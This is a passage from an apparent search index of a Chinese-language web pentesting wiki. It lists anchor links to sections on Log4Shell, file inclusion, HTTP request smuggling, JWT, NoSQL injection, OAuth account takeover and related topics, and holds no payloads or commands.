and-directory-interface-and-log4shell.html#jndi---java-naming-and-directory-interface--log4shell","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#基本信息","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#jndi命名参考","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#jndi示例","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#corba概述","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rmi上下文","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#ldap","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#log4shell漏洞","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#log4shell相关cve概述","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-44228---严重","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-45046---严重","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-4104---高","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-42550---中等","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-45105---高","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#cve-2021-44832","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#log4shell利用","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#发现","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#验证","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce-信息","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce---marshalsec-与自定义有效载荷","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce----jndiexploit","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce---jndi-exploit-kit","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce---jndi-injection-exploit-plus","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#rce---ysoserial--jndi-exploit-kit","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#绕过方法","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#自动扫描器","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#测试实验室","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#post-log4shell-利用","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#环境查找","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#异常中的提取","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#转换模式异常","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#转换模式正则表达式","pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.html#参考文献","pentesting-web/deserialization/ruby-_json-pollution.html#ruby-_json-污染","pentesting-web/deserialization/ruby-_json-pollution.html#基本信息","pentesting-web/deserialization/ruby-_json-pollution.html#参考","pentesting-web/deserialization/ruby-class-pollution.html#ruby-class-pollution","pentesting-web/deserialization/ruby-class-pollution.html#merge-on-attributes","pentesting-web/deserialization/ruby-class-pollution.html#解释","pentesting-web/deserialization/ruby-class-pollution.html#现实案例","pentesting-web/deserialization/ruby-class-pollution.html#activesupport-的-deep_merge","pentesting-web/deserialization/ruby-class-pollution.html#hashie的-deep_merge","pentesting-web/deserialization/ruby-class-pollution.html#poison-the-classes","pentesting-web/deserialization/ruby-class-pollution.html#poison-parent-class","pentesting-web/deserialization/ruby-class-pollution.html#污染其他类","pentesting-web/deserialization/ruby-class-pollution.html#references","pentesting-web/domain-subdomain-takeover.html#domainsubdomain-takeover","pentesting-web/domain-subdomain-takeover.html#domain-takeover","pentesting-web/domain-subdomain-takeover.html#subdomain-takeover","pentesting-web/domain-subdomain-takeover.html#subdomain-takeover-generation-via-dns-wildcard","pentesting-web/domain-subdomain-takeover.html#exploiting-a-subdomain-takeover","pentesting-web/domain-subdomain-takeover.html#ssl-certificates","pentesting-web/domain-subdomain-takeover.html#cookie-security-and-browser-transparency","pentesting-web/domain-subdomain-takeover.html#cors-bypass","pentesting-web/domain-subdomain-takeover.html#csrf---same-site-cookies-bypass","pentesting-web/domain-subdomain-takeover.html#oauth-tokens-redirect","pentesting-web/domain-subdomain-takeover.html#csp-bypass","pentesting-web/domain-subdomain-takeover.html#emails-and-subdomain-takeover","pentesting-web/domain-subdomain-takeover.html#higher-order-risks","pentesting-web/domain-subdomain-takeover.html#cname-record-vulnerability","pentesting-web/domain-subdomain-takeover.html#mitigation-strategies","pentesting-web/domain-subdomain-takeover.html#references","pentesting-web/email-injections.html#email-injections","pentesting-web/email-injections.html#注入已发送的电子邮件","pentesting-web/email-injections.html#在发件人参数后注入-cc-和-bcc","pentesting-web/email-injections.html#注入参数","pentesting-web/email-injections.html#注入主题参数","pentesting-web/email-injections.html#更改消息正文","pentesting-web/email-injections.html#php-mail-函数利用","pentesting-web/email-injections.html#在电子邮件名称中注入","pentesting-web/email-injections.html#被忽略的电子邮件部分","pentesting-web/email-injections.html#白名单绕过","pentesting-web/email-injections.html#引号","pentesting-web/email-injections.html#ip","pentesting-web/email-injections.html#电子邮件编码","pentesting-web/email-injections.html#其他漏洞","pentesting-web/email-injections.html#第三方-sso","pentesting-web/email-injections.html#xss","pentesting-web/email-injections.html#账户接管","pentesting-web/email-injections.html#回复至","pentesting-web/email-injections.html#硬退信率","pentesting-web/email-injections.html#参考文献","pentesting-web/file-inclusion/index.html#file-inclusionpath-traversal","pentesting-web/file-inclusion/index.html#file-inclusion","pentesting-web/file-inclusion/index.html#blind---interesting---lfi2rce-files","pentesting-web/file-inclusion/index.html#linux","pentesting-web/file-inclusion/index.html#windows","pentesting-web/file-inclusion/index.html#os-x","pentesting-web/file-inclusion/index.html#basic-lfi-and-bypasses","pentesting-web/file-inclusion/index.html#traversal-sequences-被非递归地剥离","pentesting-web/file-inclusion/index.html#null-byte-00","pentesting-web/file-inclusion/index.html#编码","pentesting-web/file-inclusion/index.html#来自已存在的文件夹","pentesting-web/file-inclusion/index.html#在服务器上探索文件系统目录","pentesting-web/file-inclusion/index.html#path-truncation-technique","pentesting-web/file-inclusion/index.html#filter-bypass-tricks","pentesting-web/file-inclusion/index.html#remote-file-inclusion","pentesting-web/file-inclusion/index.html#python-根元素","pentesting-web/file-inclusion/index.html#java-列出目录","pentesting-web/file-inclusion/index.html#前25个参数","pentesting-web/file-inclusion/index.html#lfi--rfi-使用-php-wrappers--protocols","pentesting-web/file-inclusion/index.html#phpfilter","pentesting-web/file-inclusion/index.html#使用-php-filters-作为-oracle-读取任意文件","pentesting-web/file-inclusion/index.html#phpfd","pentesting-web/file-inclusion/index.html#zip-and-rar","pentesting-web/file-inclusion/index.html#data","pentesting-web/file-inclusion/index.html#expect","pentesting-web/file-inclusion/index.html#input","pentesting-web/file-inclusion/index.html#phar","pentesting-web/file-inclusion/index.html#cve-2024-2961","pentesting-web/file-inclusion/index.html#more-protocols","pentesting-web/file-inclusion/index.html#lfi-via-phps-assert","pentesting-web/file-inclusion/index.html#php-blind-path-traversal","pentesting-web/file-inclusion/index.html#lfi2rce","pentesting-web/file-inclusion/index.html#arbitrary-file-write-via-path-traversal-webshell-rce","pentesting-web/file-inclusion/index.html#remote-file-inclusion-1","pentesting-web/file-inclusion/index.html#通过-apachenginx-日志文件","pentesting-web/file-inclusion/index.html#通过电子邮件","pentesting-web/file-inclusion/index.html#通过-procfd","pentesting-web/file-inclusion/index.html#通过-procselfenviron","pentesting-web/file-inclusion/index.html#通过-upload","pentesting-web/file-inclusion/index.html#通过-zip-文件上传","pentesting-web/file-inclusion/index.html#通过-php-sessions","pentesting-web/file-inclusion/index.html#通过-ssh","pentesting-web/file-inclusion/index.html#通过---vsftpd----日志","pentesting-web/file-inclusion/index.html#通过-php-base64-filter-using-base64","pentesting-web/file-inclusion/index.html#via-php-filters-no-file-needed","pentesting-web/file-inclusion/index.html#via-segmentation-fault","pentesting-web/file-inclusion/index.html#via-nginx-temp-file-storage","pentesting-web/file-inclusion/index.html#via-php_session_upload_progress","pentesting-web/file-inclusion/index.html#via-temp-file-uploads-in-windows","pentesting-web/file-inclusion/index.html#via-pearcmdphp--url-args","pentesting-web/file-inclusion/index.html#通过-phpinfo-file_uploads--on","pentesting-web/file-inclusion/index.html#通过-compresszlib--php_stream_prefer_studio--path-disclosure","pentesting-web/file-inclusion/index.html#通过-eternal-waiting--bruteforce","pentesting-web/file-inclusion/index.html#导致-fatal-error","pentesting-web/file-inclusion/index.html#references","pentesting-web/file-inclusion/phar-deserialization.html#phar-deserialization","pentesting-web/file-inclusion/phar-deserialization.html#参考文献","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#lfi2rce-via-php-filters","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#简介","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#如何向生成的数据添加后缀","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#自动化工具","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#完整脚本","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#improvements","pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#更多参考","pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.html#lfi2rce-via-nginx-temp-files","pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.html#易受攻击的配置","pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.html#实验室","pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.html#参考","pentesting-web/file-inclusion/via-php_session_upload_progress.html#lfi2rce-via-php_session_upload_progress","pentesting-web/file-inclusion/via-php_session_upload_progress.html#基本信息","pentesting-web/file-inclusion/via-php_session_upload_progress.html#ctf","pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.html#lfi2rce-通过分段错误","pentesting-web/file-inclusion/lfi2rce-via-phpinfo.html#理论","pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.html#php-文件上传","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#lfi2rce-via-eternal-waiting","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#基本信息","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#其他技术","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#永久等待技术","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#apache2","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#php-fmp","pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.html#nginx","pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.html#lfi2rce-通过-compresszlib--php_stream_prefer_stdio--路径泄露","pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.html#compresszlib-和-php_stream_prefer_stdio","pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.html#竞争条件到-rce","pentesting-web/file-upload/index.html#文件上传","pentesting-web/file-upload/index.html#文件上传通用方法论","pentesting-web/file-upload/index.html#绕过文件扩展名检查","pentesting-web/file-upload/index.html#bypass-content-type-magic-number-compression--resizing","pentesting-web/file-upload/index.html#other-tricks-to-check","pentesting-web/file-upload/index.html#special-extension-tricks","pentesting-web/file-upload/index.html#jetty-rce","pentesting-web/file-upload/index.html#uwsgi-rce","pentesting-web/file-upload/index.html#wget-文件上传ssrf-技巧","pentesting-web/file-upload/index.html#工具","pentesting-web/file-upload/index.html#利用-snprintf-异常破坏上传索引历史","pentesting-web/file-upload/index.html#从文件上传到其他漏洞","pentesting-web/file-upload/index.html#magic-header-bytes","pentesting-web/file-upload/index.html#ziptar-file-automatically-decompressed-upload","pentesting-web/file-upload/index.html#符号链接-symlink","pentesting-web/file-upload/index.html#在不同文件夹解压","pentesting-web/file-upload/index.html#imagetragic","pentesting-web/file-upload/index.html#在-png-中嵌入-php-shell","pentesting-web/file-upload/index.html#polyglot-files","pentesting-web/file-upload/index.html#像上传-pdf-一样上传有效的-json","pentesting-web/file-upload/index.html#参考资料","pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.html#pdf-上传---xxe-和-cors-绕过","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#formulacsvdoclatexghostscript-injection","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#formula-injection","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#info","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#wordlist","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#超链接","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#rce","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#local-file-inclusion-lfi-in-libreoffice-calc","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#google-sheets-for-out-of-band-oob-data-exfiltration","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#latex-injection","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#read-file","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#写入文件","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#命令执行","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#跨站脚本攻击","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#ghostscript-注入","pentesting-web/formula-csv-doc-latex-ghostscript-injection.html#参考文献","pentesting-web/grpc-web-pentest.html#pentesting-grpc-web","pentesting-web/grpc-web-pentest.html#操纵-grpc-web-负载","pentesting-web/grpc-web-pentest.html#使用-ggrpc-coder-工具手动操作","pentesting-web/grpc-web-pentest.html#使用-grpc-web-coder-burp-suite-扩展的手动操作","pentesting-web/grpc-web-pentest.html#分析-grpc-web-javascript-文件","pentesting-web/grpc-web-pentest.html#参考文献","pentesting-web/http-connection-contamination.html#http-连接污染","pentesting-web/http-connection-request-smuggling.html#http-connection-request-smuggling","pentesting-web/http-connection-request-smuggling.html#connection-state-attacks","pentesting-web/http-connection-request-smuggling.html#first-request-validation","pentesting-web/http-connection-request-smuggling.html#first-request-routing","pentesting-web/http-connection-request-smuggling.html#2023-2025-新增--http23-连接合并滥用","pentesting-web/http-connection-request-smuggling.html#利用场景","pentesting-web/http-connection-request-smuggling.html#工具","pentesting-web/http-connection-request-smuggling.html#缓解措施","pentesting-web/http-connection-request-smuggling.html#真实案例-2022-2025","pentesting-web/http-connection-request-smuggling.html#检测备忘单","pentesting-web/http-connection-request-smuggling.html#参考文献","pentesting-web/http-request-smuggling/index.html#http-request-smuggling--http-desync-attack","pentesting-web/http-request-smuggling/index.html#是什么","pentesting-web/http-request-smuggling/index.html#原理","pentesting-web/http-request-smuggling/index.html#实际情况","pentesting-web/http-request-smuggling/index.html#细节","pentesting-web/http-request-smuggling/index.html#visible---hidden","pentesting-web/http-request-smuggling/index.html#基本示例","pentesting-web/http-request-smuggling/index.html#漏洞类型基本示例","pentesting-web/http-request-smuggling/index.html#finding-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#finding-clte-vulnerabilities-using-timing-techniques","pentesting-web/http-request-smuggling/index.html#finding-tecl-vulnerabilities-using-timing-techniques","pentesting-web/http-request-smuggling/index.html#other-methods-to-find-vulnerabilities","pentesting-web/http-request-smuggling/index.html#the-expect-100-continue-header","pentesting-web/http-request-smuggling/index.html#http-request-smuggling-vulnerability-testing","pentesting-web/http-request-smuggling/index.html#distinguishing-http11-pipelining-artifacts-vs-genuine-request-smuggling","pentesting-web/http-request-smuggling/index.html#why-pipelining-creates-classic-false-positives","pentesting-web/http-request-smuggling/index.html#litmus-tests-pipelining-or-real-desync","pentesting-web/http-request-smuggling/index.html#connectionlocked-request-smuggling-reuse-required","pentesting-web/http-request-smuggling/index.html#clientside-desync-constraints","pentesting-web/http-request-smuggling/index.html#tooling-to-help-decide","pentesting-web/http-request-smuggling/index.html#abusing-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#circumventing-front-end-security-via-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#揭示前端请求重写","pentesting-web/http-request-smuggling/index.html#捕获其他用户的请求","pentesting-web/http-request-smuggling/index.html#使用-http-request-smuggling-利用-reflected-xss","pentesting-web/http-request-smuggling/index.html#exploiting-on-site-redirects-with-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#利用-web-cache-poisoning-通过-http-request-smuggling","pentesting-web/http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception","pentesting-web/http-request-smuggling/index.html#通过-http-request-smuggling-滥用-trace","pentesting-web/http-request-smuggling/index.html#abusing-trace-via-http-response-splitting","pentesting-web/http-request-smuggling/index.html#使用-http-response-desynchronisation-将-http-request-smuggling-武器化","pentesting-web/http-request-smuggling/index.html#其他-http-request-smuggling-技术","pentesting-web/http-request-smuggling/index.html#turbo-intruder-脚本","pentesting-web/http-request-smuggling/index.html#clte","pentesting-web/http-request-smuggling/index.html#tecl","pentesting-web/http-request-smuggling/index.html#工具","pentesting-web/http-request-smuggling/index.html#参考资料","pentesting-web/http-request-smuggling/browser-http-request-smuggling.html#浏览器-http-请求走私","pentesting-web/http-request-smuggling/browser-http-request-smuggling.html#参考","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#http2降级中的请求走私","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#为什么会发生降级","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#两种主要原始类","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#识别降级链","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#利用工作流程h2te示例","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#h2c-走私明文升级","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#notable-real-world-cves-2022-2025","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#工具","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#防御措施","pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.html#参考文献","pentesting-web/http-response-smuggling-desync.html#http-response-smuggling--desync","pentesting-web/http-response-smuggling-desync.html#http-请求队列去同步","pentesting-web/http-response-smuggling-desync.html#http-管道去同步","pentesting-web/http-response-smuggling-desync.html#多重嵌套注入","pentesting-web/http-response-smuggling-desync.html#漏洞组织","pentesting-web/http-response-smuggling-desync.html#利用-http-响应队列去同步","pentesting-web/http-response-smuggling-desync.html#捕获其他用户的请求","pentesting-web/http-response-smuggling-desync.html#响应去同步","pentesting-web/http-response-smuggling-desync.html#内容混淆","pentesting-web/http-response-smuggling-desync.html#缓存中毒","pentesting-web/http-response-smuggling-desync.html#web-缓存欺骗","pentesting-web/http-response-smuggling-desync.html#响应分割","pentesting-web/h2c-smuggling.html#升级头部走私","pentesting-web/h2c-smuggling.html#h2c-走私","pentesting-web/h2c-smuggling.html#websocket-smuggling","pentesting-web/h2c-smuggling.html#场景-1","pentesting-web/h2c-smuggling.html#场景-2","pentesting-web/h2c-smuggling.html#参考文献","pentesting-web/abusing-hop-by-hop-headers.html#hop-by-hop-headers","pentesting-web/abusing-hop-by-hop-headers.html#滥用-hop-by-hop-headers","pentesting-web/abusing-hop-by-hop-headers.html#测试-hop-by-hop-header-处理","pentesting-web/abusing-hop-by-hop-headers.html#通过-x-forwarded-for-绕过安全控制","pentesting-web/abusing-hop-by-hop-headers.html#通过-hop-by-hop-header-注入进行缓存中毒","pentesting-web/idor.html#idor-insecure-direct-object-reference","pentesting-web/idor.html#1-识别潜在的-idors","pentesting-web/idor.html#quick-manual-tampering-burp-repeater","pentesting-web/idor.html#自动化枚举-burp-intruder--curl-loop","pentesting-web/idor.html#error-response-oracle-for-userfile-enumeration","pentesting-web/idor.html#2-真实案例研究--mchire-chatbot-platform-2025","pentesting-web/idor.html#3-idor--bola-的影响","pentesting-web/idor.html#4-缓解措施与最佳实践","pentesting-web/idor.html#5-工具","pentesting-web/idor.html#参考资料","pentesting-web/hacking-jwt-json-web-tokens.html#jwt-vulnerabilities-json-web-tokens","pentesting-web/hacking-jwt-json-web-tokens.html#快速胜利","pentesting-web/hacking-jwt-json-web-tokens.html#在不修改任何内容的情况下篡改数据","pentesting-web/hacking-jwt-json-web-tokens.html#来源","pentesting-web/hacking-jwt-json-web-tokens.html#持续时间","pentesting-web/hacking-jwt-json-web-tokens.html#暴力破解-hmac-密钥","pentesting-web/hacking-jwt-json-web-tokens.html#将算法修改为-none","pentesting-web/hacking-jwt-json-web-tokens.html#将算法-rs256非对称更改为-hs256对称cve-2016-5431cve-2016-10555","pentesting-web/hacking-jwt-json-web-tokens.html#new-public-key-inside-the-header","pentesting-web/hacking-jwt-json-web-tokens.html#jwks-spoofing","pentesting-web/hacking-jwt-json-web-tokens.html#kid-issues-overview","pentesting-web/hacking-jwt-json-web-tokens.html#x5u和jku","pentesting-web/hacking-jwt-json-web-tokens.html#嵌入式公钥-cve-2018-0114","pentesting-web/hacking-jwt-json-web-tokens.html#es256使用相同的随机数泄露私钥","pentesting-web/hacking-jwt-json-web-tokens.html#jti-jwt-id","pentesting-web/hacking-jwt-json-web-tokens.html#jwt-注册声明","pentesting-web/hacking-jwt-json-web-tokens.html#其他攻击","pentesting-web/hacking-jwt-json-web-tokens.html#工具","pentesting-web/json-xml-yaml-hacking.html#json-xml--yaml-hacking--issues","pentesting-web/json-xml-yaml-hacking.html#go-json-解码器","pentesting-web/json-xml-yaml-hacking.html#反序列化意外数据","pentesting-web/json-xml-yaml-hacking.html#解析器差异","pentesting-web/json-xml-yaml-hacking.html#数据格式混淆多语言","pentesting-web/json-xml-yaml-hacking.html#显著的解析器漏洞2023-2025","pentesting-web/json-xml-yaml-hacking.html#snakeyaml-反序列化-rce-cve-2022-1471","pentesting-web/json-xml-yaml-hacking.html#libyaml-双重释放-cve-2024-35325","pentesting-web/json-xml-yaml-hacking.html#rapidjson-整数下上溢出-cve-2024-38517--cve-2024-39684","pentesting-web/json-xml-yaml-hacking.html#-缓解措施更新","pentesting-web/json-xml-yaml-hacking.html#参考文献","pentesting-web/ldap-injection.html#ldap-注入","pentesting-web/ldap-injection.html#ldap-注入-1","pentesting-web/ldap-injection.html#ldap","pentesting-web/ldap-injection.html#登录绕过","pentesting-web/ldap-injection.html#隐式-ldap-注入","pentesting-web/ldap-injection.html#scripts","pentesting-web/ldap-injection.html#google-dorks","pentesting-web/ldap-injection.html#更多有效载荷","pentesting-web/login-bypass/index.html#登录绕过","pentesting-web/login-bypass/index.html#绕过常规登录","pentesting-web/login-bypass/index.html#sql-注入认证绕过","pentesting-web/login-bypass/index.html#无-sql-注入认证绕过","pentesting-web/login-bypass/index.html#xpath-注入认证绕过","pentesting-web/login-bypass/index.html#ldap注入认证绕过","pentesting-web/login-bypass/index.html#记住我","pentesting-web/login-bypass/index.html#重定向","pentesting-web/login-bypass/index.html#其他检查","pentesting-web/login-bypass/index.html#自动化工具","pentesting-web/login-bypass/sql-login-bypass.html","pentesting-web/nosql-injection.html#nosql-注入","pentesting-web/nosql-injection.html#利用","pentesting-web/nosql-injection.html#基本认证绕过","pentesting-web/nosql-injection.html#sql---mongo","pentesting-web/nosql-injection.html#提取--长度--信息","pentesting-web/nosql-injection.html#提取--数据--信息","pentesting-web/nosql-injection.html#sql---mongo-1","pentesting-web/nosql-injection.html#php-任意函数执行","pentesting-web/nosql-injection.html#从不同集合获取信息","pentesting-web/nosql-injection.html#基于错误的注入","pentesting-web/nosql-injection.html#最近的-cve-和现实世界的利用-2023-2025","pentesting-web/nosql-injection.html#rocketchat-未认证盲-nosqli--cve-2023-28359","pentesting-web/nosql-injection.html#mongoose-populatematch-where-rce--cve-2024-53900--cve-2025-23061","pentesting-web/nosql-injection.html#graphql--mongo-过滤器混淆","pentesting-web/nosql-injection.html#防御备忘单更新于2025年","pentesting-web/nosql-injection.html#mongodb-载荷","pentesting-web/nosql-injection.html#盲目-nosql-脚本","pentesting-web/nosql-injection.html#从post登录进行暴力破解登录用户名和密码","pentesting-web/nosql-injection.html#工具","pentesting-web/nosql-injection.html#参考文献","pentesting-web/oauth-to-account-takeover.html#oauth-到账户接管","pentesting-web/oauth-to-account-takeover.html#基本信息","pentesting-web/oauth-to-account-takeover.html#流程","pentesting-web/oauth-to-account-takeover.html#漏洞","pentesting-web/oauth-to-account-takeover.html#开放的-redirect_uri","pentesting-web/oauth-to-account-takeover.html#重定向实现中的-xss","pentesting-web/oauth-to-account-takeover.html#csrf---不当处理状态参数","pentesting-web/oauth-to-account-takeover.html#预账户接管","pentesting-web/oauth-to-account-takeover.html#秘密泄露","pentesting-web/oauth-to-account-takeover.html#客户端秘密暴力破解","pentesting-web/oauth-to-account-takeover.html#referer-header-leaking-code--state","pentesting-web/oauth-to-account-takeover.html#access-token-stored-in-browser-history","pentesting-web/oauth-to-account-takeover.html#everlasting-authorization-code","pentesting-web/oauth-to-account-takeover.html#authorizationrefresh-token-not-bound-to-client","pentesting-web/oauth-to-account-takeover.html#happy-paths-xss-iframes--post-messages-to-leak-code--state-values","pentesting-web/oauth-to-account-takeover.html#aws-cognito","pentesting-web/oauth-to-account-takeover.html#滥用其他应用程序令牌","pentesting-web/oauth-to-account-takeover.html#两个链接和-cookie","pentesting-web/oauth-to-account-takeover.html#提示交互绕过","pentesting-web/oauth-to-account-takeover.html#response_mode","pentesting-web/oauth-to-account-takeover.html#oauth-ropc-流程---2-fa-绕过","pentesting-web/oauth-to-account-takeover.html#基于开放重定向的网页重定向-ato","pentesting-web/oauth-to-account-takeover.html#ssrfs-参数","pentesting-web/oauth-to-account-takeover.html#oauth-提供者竞争条件","pentesting-web/oauth-to-account-takeover.html#可变声明攻击","pentesting-web/oauth-to-account-takeover.html#客户端混淆攻击","pentesting-web/oauth-to-account-takeover.html#范围升级攻击","pentesting-web/oauth-to-account-takeover.html#重定向方案劫持","pentesting-web/oauth-to-account-takeover.html#参考文献","pentesting-web/open-redirect.html#open-redirect","pentesting-web/open-redirect.html#open-redirect-1","pentesting-web/open-redirect.html#重定向到本地主机或任意域名","pentesting-web/open-redirect.html#开放重定向到xss","pentesting-web/open-redirect.html#open-redirect-上传-svg-文件","pentesting-web/open-redirect.html#常见注入参数","pentesting-web/open-redirect.html#代码示例","pentesting-web/open-redirect.html#工具","pentesting-web/open-redirect.html#资源","pentesting-web/orm-injection.html#orm-injection","pentesting-web/orm-injection.html#django-orm-python","pentesting-web/orm-injection.html#prisma-orm-nodejs","pentesting-web/orm-injection.html#ransack-ruby","pentesting-web/orm-injection.html#references","pentesting-web/parameter-pollution.html#参数污染--json-注入","pentesting-web/parameter-pollution.html#http-参数污染-hpp-概述","pentesting-web/parameter-pollution.html#http-参数污染-hpp-示例","pentesting-web/parameter-pollution.html#php-和-hpp-利用","pentesting-web/parameter-pollution.html#参数解析flask-与-php","pentesting-web/parameter-pollution.html#按技术分类的参数污染","pentesting-web/parameter-pollution.html#php-8311-和-apache-2462","pentesting-web/parameter-pollution.html#ruby-335-和-webrick-182","pentesting-web/parameter-pollution.html#spring-mvc-6023-和-apache-tomcat-10130","pentesting-web/parameter-pollution.html#nodejs--20170--和--express-4210","pentesting-web/parameter-pollution.html#go-1227","pentesting-web/parameter-pollution.html#python-3126-和-werkzeug-304-和-flask-303","pentesting-web/parameter-pollution.html#python-3126-和-django-4215","pentesting-web/parameter-pollution.html#python-3126-和-tornado-641","pentesting-web/parameter-pollution.html#json-注入","pentesting-web/parameter-pollution.html#重复键","pentesting-web/parameter-pollution.html#键冲突字符截断和注释","pentesting-web/parameter-pollution.html#使用注释截断","pentesting-web/parameter-pollution.html#不一致的优先级反序列化与序列化","pentesting-web/parameter-pollution.html#float-和-integer","pentesting-web/parameter-pollution.html#参考文献","pentesting-web/phone-number-injections.html#电话号码注入","pentesting-web/phone-number-injections.html#参考","pentesting-web/postmessage-vulnerabilities/index.html#postmessage-漏洞","pentesting-web/postmessage-vulnerabilities/index.html#发送--postmessage","pentesting-web/postmessage-vulnerabilities/index.html#攻击-iframe-和--targetorigin--中的通配符","pentesting-web/postmessage-vulnerabilities/index.html#addeventlistener-利用","pentesting-web/postmessage-vulnerabilities/index.html#枚举","pentesting-web/postmessage-vulnerabilities/index.html#来源检查绕过","pentesting-web/postmessage-vulnerabilities/index.html#eorigin--windoworigin-绕过","pentesting-web/postmessage-vulnerabilities/index.html#绕过-esource","pentesting-web/postmessage-vulnerabilities/index.html#x-frame-header-绕过","pentesting-web/postmessage-vulnerabilities/index.html#通过阻止主页面窃取发送给子页面的消息","pentesting-web/postmessage-vulnerabilities/index.html#通过修改iframe位置窃取消息","pentesting-web/postmessage-vulnerabilities/index.html#postmessage导致原型污染和或xss","pentesting-web/postmessage-vulnerabilities/index.html#参考文献","pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.html#阻止主页面以窃取-postmessage","pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.html#使用-iframes-赢得-rcs","pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.html#bypassing-sop-with-iframes---1","pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.html#iframes-in-sop-1","pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.html#sop绕过1-eorigin--null","pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.html#sop绕过2-windoworigin--null","pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.html#挑战解决方案","pentesting-web/postmessage-vulnerab